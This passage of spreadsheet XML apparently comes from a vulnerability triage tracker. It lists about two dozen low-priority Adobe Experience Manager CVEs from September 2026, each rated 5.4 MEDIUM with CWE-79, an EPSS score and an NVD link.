t="inlineStr"><is><t>NVD</t></is></c><c r="O1406" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1406" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1406" s="5" t="inlineStr" /><c r="R1406" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75693</t></is></c></row><row r="1407"><c r="A1407" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1407" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1407" s="5" t="inlineStr"><is><t>CVE-2026-75694</t></is></c><c r="D1407" s="5" t="n"><v>5.4</v></c><c r="E1407" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1407" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1407" s="5" t="inlineStr" /><c r="H1407" s="5" t="n"><v>0.003</v></c><c r="I1407" s="5" t="inlineStr" /><c r="J1407" s="5" t="inlineStr" /><c r="K1407" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1407" s="5" t="inlineStr" /><c r="M1407" s="5" t="inlineStr" /><c r="N1407" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1407" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1407" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1407" s="5" t="inlineStr" /><c r="R1407" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75694</t></is></c></row><row r="1408"><c r="A1408" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1408" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1408" s="5" t="inlineStr"><is><t>CVE-2026-75695</t></is></c><c r="D1408" s="5" t="n"><v>5.4</v></c><c r="E1408" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1408" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1408" s="5" t="inlineStr" /><c r="H1408" s="5" t="n"><v>0.003</v></c><c r="I1408" s="5" t="inlineStr" /><c r="J1408" s="5" t="inlineStr" /><c r="K1408" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1408" s="5" t="inlineStr" /><c r="M1408" s="5" t="inlineStr" /><c r="N1408" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1408" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1408" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1408" s="5" t="inlineStr" /><c r="R1408" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75695</t></is></c></row><row r="1409"><c r="A1409" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1409" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1409" s="5" t="inlineStr"><is><t>CVE-2026-75696</t></is></c><c r="D1409" s="5" t="n"><v>5.4</v></c><c r="E1409" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1409" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1409" s="5" t="inlineStr" /><c r="H1409" s="5" t="n"><v>0.003</v></c><c r="I1409" s="5" t="inlineStr" /><c r="J1409" s="5" t="inlineStr" /><c r="K1409" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1409" s="5" t="inlineStr" /><c r="M1409" s="5" t="inlineStr" /><c r="N1409" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1409" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1409" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1409" s="5" t="inlineStr" /><c r="R1409" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75696</t></is></c></row><row r="1410"><c r="A1410" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1410" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1410" s="5" t="inlineStr"><is><t>CVE-2026-75700</t></is></c><c r="D1410" s="5" t="n"><v>5.4</v></c><c r="E1410" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1410" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1410" s="5" t="inlineStr" /><c r="H1410" s="5" t="n"><v>0.003</v></c><c r="I1410" s="5" t="inlineStr" /><c r="J1410" s="5" t="inlineStr" /><c r="K1410" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1410" s="5" t="inlineStr" /><c r="M1410" s="5" t="inlineStr" /><c r="N1410" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1410" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1410" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1410" s="5" t="inlineStr" /><c r="R1410" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75700</t></is></c></row><row r="1411"><c r="A1411" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1411" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1411" s="5" t="inlineStr"><is><t>CVE-2026-75701</t></is></c><c r="D1411" s="5" t="n"><v>5.4</v></c><c r="E1411" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1411" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1411" s="5" t="inlineStr" /><c r="H1411" s="5" t="n"><v>0.003</v></c><c r="I1411" s="5" t="inlineStr" /><c r="J1411" s="5" t="inlineStr" /><c r="K1411" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1411" s="5" t="inlineStr" /><c r="M1411" s="5" t="inlineStr" /><c r="N1411" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1411" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1411" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1411" s="5" t="inlineStr" /><c r="R1411" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75701</t></is></c></row><row r="1412"><c r="A1412" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1412" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1412" s="5" t="inlineStr"><is><t>CVE-2026-75702</t></is></c><c r="D1412" s="5" t="n"><v>5.4</v></c><c r="E1412" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1412" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1412" s="5" t="inlineStr" /><c r="H1412" s="5" t="n"><v>0.003</v></c><c r="I1412" s="5" t="inlineStr" /><c r="J1412" s="5" t="inlineStr" /><c r="K1412" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1412" s="5" t="inlineStr" /><c r="M1412" s="5" t="inlineStr" /><c r="N1412" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1412" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1412" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1412" s="5" t="inlineStr" /><c r="R1412" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75702</t></is></c></row><row r="1413"><c r="A1413" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1413" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1413" s="5" t="inlineStr"><is><t>CVE-2026-75704</t></is></c><c r="D1413" s="5" t="n"><v>5.4</v></c><c r="E1413" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1413" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1413" s="5" t="inlineStr" /><c r="H1413" s="5" t="n"><v>0.003</v></c><c r="I1413" s="5" t="inlineStr" /><c r="J1413" s="5" t="inlineStr" /><c r="K1413" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1413" s="5" t="inlineStr" /><c r="M1413" s="5" t="inlineStr" /><c r="N1413" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1413" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1413" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1413" s="5" t="inlineStr" /><c r="R1413" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75704</t></is></c></row><row r="1414"><c r="A1414" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1414" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1414" s="5" t="inlineStr"><is><t>CVE-2026-75705</t></is></c><c r="D1414" s="5" t="n"><v>5.4</v></c><c r="E1414" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1414" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1414" s="5" t="inlineStr" /><c r="H1414" s="5" t="n"><v>0.003</v></c><c r="I1414" s="5" t="inlineStr" /><c r="J1414" s="5" t="inlineStr" /><c r="K1414" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1414" s="5" t="inlineStr" /><c r="M1414" s="5" t="inlineStr" /><c r="N1414" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1414" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1414" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1414" s="5" t="inlineStr" /><c r="R1414" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75705</t></is></c></row><row r="1415"><c r="A1415" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1415" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1415" s="5" t="inlineStr"><is><t>CVE-2026-75706</t></is></c><c r="D1415" s="5" t="n"><v>5.4</v></c><c r="E1415" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1415" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1415" s="5" t="inlineStr" /><c r="H1415" s="5" t="n"><v>0.003</v></c><c r="I1415" s="5" t="inlineStr" /><c r="J1415" s="5" t="inlineStr" /><c r="K1415" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1415" s="5" t="inlineStr" /><c r="M1415" s="5" t="inlineStr" /><c r="N1415" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1415" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1415" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1415" s="5" t="inlineStr" /><c r="R1415" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75706</t></is></c></row><row r="1416"><c r="A1416" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1416" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1416" s="5" t="inlineStr"><is><t>CVE-2026-75707</t></is></c><c r="D1416" s="5" t="n"><v>5.4</v></c><c r="E1416" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1416" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1416" s="5" t="inlineStr" /><c r="H1416" s="5" t="n"><v>0.003</v></c><c r="I1416" s="5" t="inlineStr" /><c r="J1416" s="5" t="inlineStr" /><c r="K1416" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1416" s="5" t="inlineStr" /><c r="M1416" s="5" t="inlineStr" /><c r="N1416" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1416" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1416" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1416" s="5" t="inlineStr" /><c r="R1416" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75707</t></is></c></row><row r="1417"><c r="A1417" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1417" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1417" s="5" t="inlineStr"><is><t>CVE-2026-75708</t></is></c><c r="D1417" s="5" t="n"><v>5.4</v></c><c r="E1417" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1417" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1417" s="5" t="inlineStr" /><c r="H1417" s="5" t="n"><v>0.003</v></c><c r="I1417" s="5" t="inlineStr" /><c r="J1417" s="5" t="inlineStr" /><c r="K1417" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1417" s="5" t="inlineStr" /><c r="M1417" s="5" t="inlineStr" /><c r="N1417" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1417" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1417" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1417" s="5" t="inlineStr" /><c r="R1417" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75708</t></is></c></row><row r="1418"><c r="A1418" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1418" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1418" s="5" t="inlineStr"><is><t>CVE-2026-75709</t></is></c><c r="D1418" s="5" t="n"><v>5.4</v></c><c r="E1418" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1418" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1418" s="5" t="inlineStr" /><c r="H1418" s="5" t="n"><v>0.003</v></c><c r="I1418" s="5" t="inlineStr" /><c r="J1418" s="5" t="inlineStr" /><c r="K1418" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1418" s="5" t="inlineStr" /><c r="M1418" s="5" t="inlineStr" /><c r="N1418" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1418" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1418" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1418" s="5" t="inlineStr" /><c r="R1418" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75709</t></is></c></row><row r="1419"><c r="A1419" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1419" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1419" s="5" t="inlineStr"><is><t>CVE-2026-75710</t></is></c><c r="D1419" s="5" t="n"><v>5.4</v></c><c r="E1419" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1419" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1419" s="5" t="inlineStr" /><c r="H1419" s="5" t="n"><v>0.003</v></c><c r="I1419" s="5" t="inlineStr" /><c r="J1419" s="5" t="inlineStr" /><c r="K1419" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1419" s="5" t="inlineStr" /><c r="M1419" s="5" t="inlineStr" /><c r="N1419" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1419" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1419" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1419" s="5" t="inlineStr" /><c r="R1419" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75710</t></is></c></row><row r="1420"><c r="A1420" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1420" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1420" s="5" t="inlineStr"><is><t>CVE-2026-75711</t></is></c><c r="D1420" s="5" t="n"><v>5.4</v></c><c r="E1420" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1420" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1420" s="5" t="inlineStr" /><c r="H1420" s="5" t="n"><v>0.003</v></c><c r="I1420" s="5" t="inlineStr" /><c r="J1420" s="5" t="inlineStr" /><c r="K1420" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1420" s="5" t="inlineStr" /><c r="M1420" s="5" t="inlineStr" /><c r="N1420" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1420" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1420" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1420" s="5" t="inlineStr" /><c r="R1420" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75711</t></is></c></row><row r="1421"><c r="A1421" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1421" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1421" s="5" t="inlineStr"><is><t>CVE-2026-75712</t></is></c><c r="D1421" s="5" t="n"><v>5.4</v></c><c r="E1421" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1421" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1421" s="5" t="inlineStr" /><c r="H1421" s="5" t="n"><v>0.003</v></c><c r="I1421" s="5" t="inlineStr" /><c r="J1421" s="5" t="inlineStr" /><c r="K1421" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1421" s="5" t="inlineStr" /><c r="M1421" s="5" t="inlineStr" /><c r="N1421" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1421" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1421" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1421" s="5" t="inlineStr" /><c r="R1421" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75712</t></is></c></row><row r="1422"><c r="A1422" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1422" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1422" s="5" t="inlineStr"><is><t>CVE-2026-75713</t></is></c><c r="D1422" s="5" t="n"><v>5.4</v></c><c r="E1422" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1422" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1422" s="5" t="inlineStr" /><c r="H1422" s="5" t="n"><v>0.003</v></c><c r="I1422" s="5" t="inlineStr" /><c r="J1422" s="5" t="inlineStr" /><c r="K1422" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1422" s="5" t="inlineStr" /><c r="M1422" s="5" t="inlineStr" /><c r="N1422" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1422" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1422" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1422" s="5" t="inlineStr" /><c r="R1422" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75713</t></is></c></row><row r="1423"><c r="A1423" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1423" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1423" s="5" t="inlineStr"><is><t>CVE-2026-75714</t></is></c><c r="D1423" s="5" t="n"><v>5.4</v></c><c r="E1423" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1423" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1423" s="5" t="inlineStr" /><c r="H1423" s="5" t="n"><v>0.003</v></c><c r="I1423" s="5" t="inlineStr" /><c r="J1423" s="5" t="inlineStr" /><c r="K1423" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1423" s="5" t="inlineStr" /><c r="M1423" s="5" t="inlineStr" /><c r="N1423" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1423" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1423" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1423" s="5" t="inlineStr" /><c r="R1423" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75714</t></is></c></row><row r="1424"><c r="A1424" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1424" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1424" s="5" t="inlineStr"><is><t>CVE-2026-75715</t></is></c><c r="D1424" s="5" t="n"><v>5.4</v></c><c r="E1424" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1424" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1424" s="5" t="inlineStr" /><c r="H1424" s="5" t="n"><v>0.003</v></c><c r="I1424" s="5" t="inlineStr" /><c r="J1424" s="5" t="inlineStr" /><c r="K1424" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1424" s="5" t="inlineStr" /><c r="M1424" s="5" t="inlineStr" /><c r="N1424" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1424" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1424" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1424" s="5" t="inlineStr" /><c r="R1424" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75715</t></is></c></row><row r="1425"><c r="A1425" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1425" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1425" s="5" t="inlineStr"><is><t>CVE-2026-75716</t></is></c><c r="D1425" s="5" t="n"><v>5.4</v></c><c r="E1425" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1425" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1425" s="5" t="inlineStr" /><c r="H1425" s="5" t="n"><v>0.003</v></c><c r="I1425" s="5" t="inlineStr" /><c r="J1425" s="5" t="inlineStr" /><c r="K1425" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1425" s="5" t="inlineStr" /><c r="M1425" s="5" t="inlineStr" /><c r="N1425" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1425" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1425" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1425" s="5" t="inlineStr" /><c r="R1425" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75716</t></is></c></row><row r="1426"><c r="A1426" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1426" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1426" s="5" t="inlineStr"><is><t>CVE-2026-75717</t></is></c><c r="D1426" s="5" t="n"><v>5.4</v></c><c r="E1426" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1426" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1426" s="5" t="inlineStr" /><c r="H1426" s="5" t="n"><v>0.003</v></c><c r="I1426" s="5" t="inlineStr" /><c r="J1426" s="5" t="inlineStr" /><c r="K1426" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1426" s="5" t="inlineStr" /><c r="M1426" s="5" t="inlineStr" /><c r="N1426" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1426" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1426" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1426" s="5" t="inlineStr" /><c r="R1426" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75717</t></is></c></row><row r="1427"><c r="A1427" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1427" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1427" s="5" t="inlineStr"><is><t>CVE-2026-75718</t></is></c><c r="D1427" s="5" t="n"><v>5.4</v></c><c r="E1427" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1427" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1427" s="5" t="inlineStr" /><c r="H1427" s="5" t="n"><v>0.003</v></c><c r="I1427" s="5" t="inlineStr" /><c r="J1427" s="5" t="inlineStr" /><c r="K1427" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1427" s="5" t="inlineStr" /><c r="M1427" s="5" t="inlineStr" /><c r="N1427" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1427" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1427" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1427" s="5" t="inlineStr" /><c r="R1427" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75718</t></is></c></row><row r="1428"><c r="A1428" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1428" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1428" s="5" t="inlineStr"><is><t>CVE-2026-75719</t></is></c><c r="D1428" s="5" t="n"><v>5.4</v></c><c r="E1428" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1428" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1428" s="5" t="inlineStr" /><c r="H1428" s="5" t="n"><v>0.003</v></c><c r="I1428" s="5" t="inlineStr" /><c r="J1428" s="5" t="inlineStr" /><c r="K1428" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1428" s="5" t="inlineStr" /><c r="M1428" s="5" t="inlineStr" /><c r="N1428" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1428" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1428" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1428" s="5" t="inlineStr" /><c r="R1428" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75719</t></is></c></row><row r="1429"><c r="A1429" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1429" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1429" s="5" t="inlineStr"><is><t>CVE-2026-75720</t></is></c><c r="D1429" s="5" t="n"><v>5.4</v></c><c r="E1429" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1429" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1429" s="5" t="inlineStr" /><c r="H1429" s="5" t="n"><v>0.003</v></c><c r="I1429" s="5" t="inlineStr" /><c r="J1429" s="5" t="inlineStr" /><c r="K1429" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1429" s="5" t="inlineStr" /><c r="M1429" s="5" t="inlineStr" /><c r="N1429" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1429" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1429" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1429" s="5" t="inlineStr" /><c r="R1429" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75720</t></is></c></row><row r="1430"><c r="A1430" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1430" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1430" s="5" t="inlineStr"><is><t>CVE-2026-75722</t></is></c><c r="D1430" s="5" t="n"><v>5.4</v></c><c r="E1430" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1430" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1430" s="5" t="inlineStr" /><c r="H1430" s="5" t="n"><v>0.003</v></c><c r="I1430" s="5" t="inlineStr" /><c r="J1430" s="5" t="inlineStr" /><c r="K1430" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1430" s="5" t="inlineStr" /><c r="M1430" s="5" t="inlineStr" /><c r="N1430" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1430" s="5" 